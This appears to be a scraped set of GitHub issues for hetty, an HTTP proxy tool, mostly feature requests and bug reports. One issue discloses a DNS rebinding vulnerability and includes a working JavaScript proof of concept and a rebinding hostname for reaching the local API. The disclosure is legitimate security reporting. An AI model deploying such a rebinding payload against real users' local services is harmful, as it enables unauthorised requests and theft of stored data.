dstotijn / hetty Goto Github PK

Is your feature request related to a problem? Please describe.
It would be nice to have all the query parameters/URLEncodedForm listed in a separate box. In this way you can see immediatly what you are sending.

Describe the solution you'd like
A box under the current request one would be fine.

Describe alternatives you've considered
Another option could be to make a sort of drop down like behaviour that displays all the paramer sent in a coincise way.

Additional context

After this box make something like mitmproxy

Anyway nice project

Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

Describe the solution you'd like
A clear and concise description of what you want to happen.

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

Additional context
Add any other context or screenshots about the feature request here.

Please, add a flathub package on https://flathub.org/ for gnu/linux distributions.

Describe the bug

Hetty is vulnerable to DNS rebinding attacks because it does not validate the Host header.

A malicious remote server could exploit this to:

• trigger arbitrary HTTP requests to other hosts from the Hetty server (see could be used to attack services on the local network, localhost or internet);
• exfiltrate confidential data stored in Hetty.

Tested on 100.0a1 (2022-03-23).

I believe recent versions of Chrome are somehow protected against these type of attacks.

See as well https://www.gabriel.urdhr.fr/tags/dns-rebinding/ for more details in the context of other applications.

To Reproduce

function sleep(delay)
{
  return new Promise((resolve, reject) => {
    setTimeout(resolve, delay);
  });
}
async function main()
{
  while(true) {
    try {
        const response = await fetch("/api/graphql/", {
        method: "POST",
        headers: {
            "Content-Type": "application/json",
        },
        body: `{"operationName":"CreateProject","variables":{"name":"ddd"},"query":"mutation CreateProject($name: String!) {\\n  createProject(name: $name) {\\n id\\n    name\\n    __typename\\n  }\\n}"}`
        });
        if (response.status == 200) {
        alert("DONE!?")
        return;
        }
    }
    catch(e) {
    }
    await sleep(1000);
  }
}
main();

Served from a remote webserver such as:

http://a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080/

Expected behavior

Request coming from another origin should be rejected.

Screenshots

Desktop (please complete the following information):

Smartphone (please complete the following information):

Additional context

To Reproduce
Steps to reproduce the behavior:

1. curl "https://httpbin.org/get?something=somet%22ing" -x localhost:8080 -k'
2. See GET /get?something=somet"ing HTTP/1.1 in logs.

Expected behavior
Do not do such transformations before displaying.

Desktop (please complete the following information):

• OS: Linux arch 5.9.9-arch1-1 #1 SMP PREEMPT Wed, 18 Nov 2020 19:52:04 +0000 x86_64 GNU/Linux

Additional context
As a developer, I want to see the raw request because sometimes it is matters whether the payload was urlencoded or not. If it is not a bug but an intentional transformation - add a setting that can disable this behavior.

Hi, @dstotijn
I encountered a minor problem while following README. because there's no go file on the root(/) path.

go get github.com/dstotijn/hetty
package github.com/dstotijn/hetty: no Go files in /Users/hahwul/go/src/github.com/dstotijn/hetty

Until #14 is in place, there should at least be some simple tests on PRs that ensure

• package can be build
• make command can be executed
• docker image can be built
• package can be run

This is making it easier for maintainers and contributors to see if any proposed changes break basic functionality.
An easy option for this could be github actions.

add tests to make sure everything is working as expected.
Additionally it's best practice for larger projects

Describe the bug

2023/01/18 13:45:07 INFO [main] Hetty (v0.7.0) is running on :8080 ...
2023/01/18 13:45:07 INFO [main] Get started at http://localhost:8080
2023/01/18 13:45:07 INFO [main] Chrome executable not found.

To Reproduce

Steps to reproduce the behavior:

1. Using WSL Ubuntu 22
2. Installed hetty with snap
3. Installed chrome by downloading official .deb package from google, then
4. sudo apt install ./google-chrome-stable_current_amd64.deb
5. CHROME_EXECUTABLE=/usr/bin/google-chrome was defined after installing
6. /usr/bin/google-chrome was added to path after installing

Error:
INFO [main] Chrome executable not found

Expected behavior
Chrome executable should be launched with hetty

Screenshots

Desktop (please complete the following information):

• OS: WSL 22 LTS on Windows 11
• Kernel: 5.15.79.1-microsoft-standard-WSL2 (amd64)
• Browser: Google Chrome Version 109.0.5414.74
• Snap Version 2.57.5+22.04ubuntu0.1
• Hetty Version 0.7.0

Additional context
Even before I tried adding CHROME_EXECUTABLE and adding /usr/bin/google-chrome to path manually, no success

Is your feature request related to a problem? Please describe.
When I'm looking at the proxy request list, I can't enlarge the list and see more requests.

Describe the solution you'd like
I would like that in the request list there is a slider or something to be able to enlarge the window.

go version go1.15.2 linux/amd64
Operating System = Linux Mint 20

Can we use other burp suit plugins here like external installation.

Description

Currently, when querying requests from the database to be displayed on the "Proxy log", we're loading everything related to a request, This significantly increases page load time.

Proposed solution

Instead, when resolving queries, we should only traverse the tree for requested fields in the GraphQL query, e.g. use Field Collection and build queries based off that.

Is your feature request related to a problem? Please describe.
To speed up development and spend more time on other areas of the project.

Describe the solution you'd like
Why not leave the traffic capture functionality to a already established and dedicated program like, bettercap or ettercap.
Instead just forward traffic from bettercap or ettercap to hetty where it can then be analysed.
https://github.com/Ettercap/ettercap
https://github.com/bettercap/bettercap

Describe alternatives you've considered
Develop this functionality within the project but, this will take more time and work.

Additional context

Is your feature request related to a problem? Please describe.

Each time I restart Hetty I have to activate the project.

Describe the solution you'd like

I would like my last project to be selected without any additional action. I think this is safe enough to make this a new default behavior. The question is, where to store this information?

My initial idea is to save it in a simple text file in the projPath e.g. ~/.hetty/projects/last_open or something like that.

The other idea that might be worth considering is to have a project-agnostic database file e.g. ~/.hetty/Config.db where all settings that arent related to any particular project can be stored.

Let me know what you think, I'm happy to work on it.

Is your feature request related to a problem? Please describe.
Running the proxy for 30 minutes I got a 25MB database and the API started to be visible slower (3-5 seconds reported by Chrome Developer tool) ...

-rw-r--r--  1 bogdan bogdan  25M Sep 28 21:48 hetty.db

Describe the solution you'd like
The proxy should have a list of predefined content-types or file extensions that it should avoid storing in the history log (at least the response body).
example : js | css | png | jpg | gif | ico | ttf | woff | woff2

Is your feature request related to a problem? Please describe.
Since the tool itself is still pretty young, chances are there are issues.
A debug flag will help maintainers and users to better understand problems

Describe the solution you'd like
add --debug as an option

Proxying WebSockets (e.g. the upgrade process and handling frames) is not working at all. Should check if it's feasible with httputil.ReverseProxy and what the solution can be.

First of all, thank you for starting this project. I admittedly haven't had much time yet to really look around and play with it, but looks like a very handy tool to have!

One quick suggestion that I'd already like to make is one for convenience and with some luck one that is relatively easy to implement:

When one wants to play around with mobile devices, you need to somehow get the certificate to them.
It would be convenient if Hetty had a special URL endpoint like "/ssl" or "/getssl" like Charles Proxy to download the generated/configured certificate. You'd be able to grab your phone/tablet, browse to that built-in link, install the certificate and be on your traffic-inspecting way!

Hey, this is a cool project. I wrote a Go HTTP fuzzer (https://github.com/JonCooperWorks/httpfuzz) that could be a quick drop in to the Hetty. The only issue is the UI. What did you envision it looking like?

Describe the bug
using hetty cert install fails

To Reproduce
Steps to reproduce the behavior:

1. install hetty using snap on kali
2. add bin to env file
3. type hetty cert install

hetty cert install
2023/11/06 11:56:53 INFO To install the certificate in the system trust store, you might be prompted for your password.
2023/11/06 11:56:53 FATAL Command failed. {"error": "failed to install certificate: failed to execute sudo: fork/exec /usr/bin/sudo: permission denied"}

Expected behavior
cert installs

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

• OS: kali vm latest

• Allow changing request before it's sent.
• Allow changing response before it's written to client.

As we can define scope urls, we should also be able to remove certain specific URLs from scope with regex.

What do you think?

Add search option in proxy logs

Just tried running on Ubuntu 20.04, no dice.

[FATAL] Could not load CA key pair: open : no such file or directory

Is your feature request related to a problem? Please describe.
Each time I run hetty the log records are persisted and over time it slows down the UI significantly.

Describe the solution you'd like
I want to have a button, next to the search field, that allows me to clear all logs that are currently in the active project.

Additional context
I'm happy to work on it but before I start I would like to hear your thoughts @dstotijn to not waste time on a closed PR.

PS. Contribution Guidelines mention using labels but editing labels is disabled.

It's a bit hard to use this tool after the burpsuite as the proxy tabs look uncomfortable to me. It would be cool to have a possibility to resize these "windows" like proxy logs, request, and response tabs. The proxy log table also lacks customization as we can't change the columns' order or add new ones (for example, 'id').

Is your feature request related to a problem? Please describe.
The docker image made available on docker hub is only compatible with the "linux/arm64/v8" architecture.

Describe the solution you'd like
It would be useful to support other popular architectures such as "linux/amd64" as well.

Describe alternatives you've considered
I've tried to run it with "docker run --platform=linux/amd64", but this was unsuccessful.

i saw your message on the genji slack..

I use genji and love it and it would make it easier to work on your project too. i like the concept of a infosec tool like like this, and for setting bug bounties on github projects with it.

Is your feature request related to a problem? Please describe.

An easy way to automate the creation and installation of local ztLS so that https works for all OS and browsers you have installed.

Describe the solution you'd like

Golang based and reproducibility using the golang tool called mkcdrt from the security researcher that works at google.

https://github.com/FiloSottile/mkcert

Describe alternatives you've considered

None . I find mkcert to work very well.

Additional context

For requests being received and sent, the ability to remove/drop/edit headers/cookies would be an awesome feature to have!

I just download the latest release file and run it directly. I got the following error when I go to http://127.0.0.1:8080 (HTTP ERROR 502). It happened in both mac and linux(kali).

is this a bug or just something wrong with my operation?

Problem

Typically, HTTP security research work is done in the context of a project, e.g. a specific bug bounty program, website/web service. To make it easier to consolidate all settings and accumulated work (scope, logs, results, notes, module settings, etc.), there is a need to store all of this, preferable in a portable format that can be copied, imported, stored in backups, etcetera.

Proposed solution

Add support for project files; e.g. CRUD ops to manage per-project databases, similar to Burp Suite Pro and others.

There's an issue with (cross) compiling the project for Windows. Details can be found here.

Describe the bug
The CA was set up as the doc，then still get the error
[ERROR] Securing client connection failed: handshake error: EOF

Expected behavior
https support

Screenshots

Desktop (please complete the following information):

Smartphone (please complete the following information):

• Device: [e.g. iPad 7]
• OS: [e.g. iOS13.5.1]
• Browser [e.g. stock browser, safari]
• Version [e.g. 22]

Additional context
Add any other context about the problem here.